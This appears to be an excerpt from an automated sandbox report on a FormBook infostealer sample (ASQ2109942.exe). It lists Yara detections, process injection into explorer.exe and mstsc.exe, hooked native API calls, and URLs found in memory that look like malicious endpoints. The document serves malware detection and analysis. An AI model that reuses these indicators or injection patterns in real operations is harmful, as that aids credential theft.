          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://www.visacoincard.com/px.js?ch=2
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: http://www.visacoincard.com/sk-logabpstatus.php?a=bTkvQXVIY29ocWNFMFhFSkY2aytLNW9Fb3lHWHpnMzgvNG43ek
          Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: https://www.domain.com/controlpanel/domaincentral/3.0/
          Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmpString found in binary or memory: https://www.register.com/whois.rcmx?domainName=Visacoincard.com
          Source: C:\Windows\explorer.exeCode function: 7_2_04E03042 OpenClipboard,7_2_04E03042

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.924444955.0000000001060000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.732076102.0000000000601000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.734679280.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.926694573.0000000005030000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.689992016.00000000008A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.734762726.0000000000960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.926553186.0000000005000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.ASQ2109942.exe.600000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ASQ2109942.exe.8a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ASQ2109942.exe.8a0000.1.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000C.00000002.924444955.0000000001060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.924444955.0000000001060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.732076102.0000000000601000.00000020.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.732076102.0000000000601000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.734679280.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.734679280.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.926694573.0000000005030000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.926694573.0000000005030000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.689992016.00000000008A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.689992016.00000000008A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.734762726.0000000000960000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.734762726.0000000000960000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.926553186.0000000005000000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.926553186.0000000005000000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.ASQ2109942.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.ASQ2109942.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.ASQ2109942.exe.8a0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.ASQ2109942.exe.8a0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.ASQ2109942.exe.8a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.ASQ2109942.exe.8a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D098F0 NtReadVirtualMemory,LdrInitializeThunk,5_2_00D098F0
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09840 NtDelayExecution,LdrInitializeThunk,5_2_00D09840
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09860 NtQuerySystemInformation,LdrInitializeThunk,5_2_00D09860
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D099A0 NtCreateSection,LdrInitializeThunk,5_2_00D099A0
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_00D09910
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09A50 NtCreateFile,LdrInitializeThunk,5_2_00D09A50
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09A00 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00D09A00
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09A20 NtResumeThread,LdrInitializeThunk,5_2_00D09A20
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D095D0 NtClose,LdrInitializeThunk,5_2_00D095D0
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09540 NtReadFile,LdrInitializeThunk,5_2_00D09540
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D096E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_00D096E0
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_00D09660
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09FE0 NtCreateMutant,LdrInitializeThunk,5_2_00D09FE0
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09780 NtMapViewOfSection,LdrInitializeThunk,5_2_00D09780
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D097A0 NtUnmapViewOfSection,LdrInitializeThunk,5_2_00D097A0
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09710 NtQueryInformationToken,LdrInitializeThunk,5_2_00D09710
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D098A0 NtWriteVirtualMemory,5_2_00D098A0
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D0B040 NtSuspendThread,5_2_00D0B040
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09820 NtEnumerateKey,5_2_00D09820
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D099D0 NtCreateProcessEx,5_2_00D099D0
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09950 NtQueueApcThread,5_2_00D09950
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09A80 NtOpenDirectoryObject,5_2_00D09A80
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09A10 NtQuerySection,5_2_00D09A10
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D0A3B0 NtGetContextThread,5_2_00D0A3B0
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09B00 NtSetValueKey,5_2_00D09B00
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D095F0 NtQueryInformationFile,5_2_00D095F0
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09560 NtWriteFile,5_2_00D09560
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D0AD30 NtSetContextThread,5_2_00D0AD30
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09520 NtWaitForSingleObject,5_2_00D09520
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D096D0 NtCreateKey,5_2_00D096D0
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09650 NtQueryValueKey,5_2_00D09650
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09670 NtQueryInformationProcess,5_2_00D09670
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09610 NtEnumerateValueKey,5_2_00D09610
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09770 NtSetInformationFile,5_2_00D09770
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D0A770 NtOpenThread,5_2_00D0A770
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09760 NtOpenProcess,5_2_00D09760
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D0A710 NtOpenProcessToken,5_2_00D0A710
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D09730 NtQueryVirtualMemory,5_2_00D09730
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9540 NtReadFile,LdrInitializeThunk,12_2_053A9540
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A95D0 NtClose,LdrInitializeThunk,12_2_053A95D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9710 NtQueryInformationToken,LdrInitializeThunk,12_2_053A9710
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9780 NtMapViewOfSection,LdrInitializeThunk,12_2_053A9780
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9FE0 NtCreateMutant,LdrInitializeThunk,12_2_053A9FE0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9660 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_053A9660
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9650 NtQueryValueKey,LdrInitializeThunk,12_2_053A9650
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A96E0 NtFreeVirtualMemory,LdrInitializeThunk,12_2_053A96E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A96D0 NtCreateKey,LdrInitializeThunk,12_2_053A96D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,12_2_053A9910
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A99A0 NtCreateSection,LdrInitializeThunk,12_2_053A99A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9860 NtQuerySystemInformation,LdrInitializeThunk,12_2_053A9860
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9840 NtDelayExecution,LdrInitializeThunk,12_2_053A9840
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9A50 NtCreateFile,LdrInitializeThunk,12_2_053A9A50
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053AAD30 NtSetContextThread,12_2_053AAD30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9520 NtWaitForSingleObject,12_2_053A9520
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9560 NtWriteFile,12_2_053A9560
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A95F0 NtQueryInformationFile,12_2_053A95F0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9730 NtQueryVirtualMemory,12_2_053A9730
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053AA710 NtOpenProcessToken,12_2_053AA710
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053AA770 NtOpenThread,12_2_053AA770
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9770 NtSetInformationFile,12_2_053A9770
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9760 NtOpenProcess,12_2_053A9760
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A97A0 NtUnmapViewOfSection,12_2_053A97A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9610 NtEnumerateValueKey,12_2_053A9610
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9670 NtQueryInformationProcess,12_2_053A9670
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9950 NtQueueApcThread,12_2_053A9950
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A99D0 NtCreateProcessEx,12_2_053A99D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9820 NtEnumerateKey,12_2_053A9820
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053AB040 NtSuspendThread,12_2_053AB040
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A98A0 NtWriteVirtualMemory,12_2_053A98A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A98F0 NtReadVirtualMemory,12_2_053A98F0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9B00 NtSetValueKey,12_2_053A9B00
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053AA3B0 NtGetContextThread,12_2_053AA3B0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9A20 NtResumeThread,12_2_053A9A20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9A10 NtQuerySection,12_2_053A9A10
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9A00 NtProtectVirtualMemory,12_2_053A9A00
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053A9A80 NtOpenDirectoryObject,12_2_053A9A80
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_01077B90 NtCreateFile,12_2_01077B90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_01077D70 NtAllocateVirtualMemory,12_2_01077D70
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_01077C40 NtReadFile,12_2_01077C40
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_01077CC0 NtClose,12_2_01077CC0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_01077B8B NtCreateFile,NtReadFile,12_2_01077B8B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_01077BE2 NtCreateFile,12_2_01077BE2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_01077D6C NtAllocateVirtualMemory,12_2_01077D6C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_01077C3A NtReadFile,12_2_01077C3A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_01077CBA NtClose,12_2_01077CBA
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_008F1BC00_2_008F1BC0
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_009071800_2_00907180
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_009051890_2_00905189
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_008FFC1E0_2_008FFC1E
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_00902DAC0_2_00902DAC
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_00918EF70_2_00918EF7
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_009156190_2_00915619
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_00913F080_2_00913F08
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_0091573D0_2_0091573D
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_009071805_2_00907180
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_009051895_2_00905189
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_008F1BC05_2_008F1BC0
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_008FFC1E5_2_008FFC1E
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00902DAC5_2_00902DAC
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00918EF75_2_00918EF7
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_009156195_2_00915619
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00913F085_2_00913F08
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_0091573D5_2_0091573D
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D928EC5_2_00D928EC
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00CDB0905_2_00CDB090
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00CF20A05_2_00CF20A0
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D920A85_2_00D920A8
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D810025_2_00D81002
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D9E8245_2_00D9E824
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00CEA8305_2_00CEA830
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00CE99BF5_2_00CE99BF
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00CCF9005_2_00CCF900
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00CE41205_2_00CE4120
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D922AE5_2_00D922AE
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D7FA2B5_2_00D7FA2B
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D803DA5_2_00D803DA
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D8DBD25_2_00D8DBD2
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00CFABD85_2_00CFABD8
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00CFEBB05_2_00CFEBB0
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00CEAB405_2_00CEAB40
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00CEA3095_2_00CEA309
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D92B285_2_00D92B28
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D8D4665_2_00D8D466
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00CD841F5_2_00CD841F
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D925DD5_2_00D925DD
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00CDD5E05_2_00CDD5E0
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00CF25815_2_00CF2581
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D91D555_2_00D91D55
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D92D075_2_00D92D07
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00CC0D205_2_00CC0D20
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D92EF75_2_00D92EF7
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D8D6165_2_00D8D616
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00CE6E305_2_00CE6E30
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D9DFCE5_2_00D9DFCE
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D91FF15_2_00D91FF1
          Source: C:\Windows\explorer.exeCode function: 7_2_04E024F27_2_04E024F2
          Source: C:\Windows\explorer.exeCode function: 7_2_04E086B27_2_04E086B2
          Source: C:\Windows\explorer.exeCode function: 7_2_04E0B28B7_2_04E0B28B
          Source: C:\Windows\explorer.exeCode function: 7_2_04E044927_2_04E04492
          Source: C:\Windows\explorer.exeCode function: 7_2_04E061F27_2_04E061F2
          Source: C:\Windows\explorer.exeCode function: 7_2_04E079497_2_04E07949
          Source: C:\Windows\explorer.exeCode function: 7_2_04E019027_2_04E01902
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_05360D2012_2_05360D20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_05431D5512_2_05431D55
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_05432D0712_2_05432D07
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_054325DD12_2_054325DD
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0539258112_2_05392581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0537D5E012_2_0537D5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0542D46612_2_0542D466
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0537841F12_2_0537841F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0543DFCE12_2_0543DFCE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_05431FF112_2_05431FF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_05386E3012_2_05386E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0542D61612_2_0542D616
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_05432EF712_2_05432EF7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0538412012_2_05384120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0536F90012_2_0536F900
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0538A83012_2_0538A830
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0542100212_2_05421002
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0543E82412_2_0543E824
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053920A012_2_053920A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0537B09012_2_0537B090
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_054328EC12_2_054328EC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_054320A812_2_054320A8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_05432B2812_2_05432B28
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0538AB4012_2_0538AB40
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0539EBB012_2_0539EBB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0542DBD212_2_0542DBD2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_054203DA12_2_054203DA
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0541FA2B12_2_0541FA2B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_054322AE12_2_054322AE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0107C16212_2_0107C162
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_01068A3012_2_01068A30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_01062D8812_2_01062D88
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_01062D9012_2_01062D90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_01062FB012_2_01062FB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0107AE4612_2_0107AE46
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0107AE4312_2_0107AE43
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: String function: 0090B3E7 appears 54 times
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: String function: 00CCB150 appears 87 times
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: String function: 00900FD0 appears 92 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0536B150 appears 54 times
          Source: ASQ2109942.exe, 00000000.00000003.688582587.0000000002516000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ASQ2109942.exe
          Source: ASQ2109942.exe, 00000005.00000002.735257427.0000000000F4F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ASQ2109942.exe
          Source: ASQ2109942.exe, 00000005.00000002.738386719.0000000002B43000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs ASQ2109942.exe
          Source: 0000000C.00000002.924444955.0000000001060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.924444955.0000000001060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.732076102.0000000000601000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.732076102.0000000000601000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.734679280.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.734679280.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.926694573.0000000005030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.926694573.0000000005030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.689992016.00000000008A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.689992016.00000000008A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
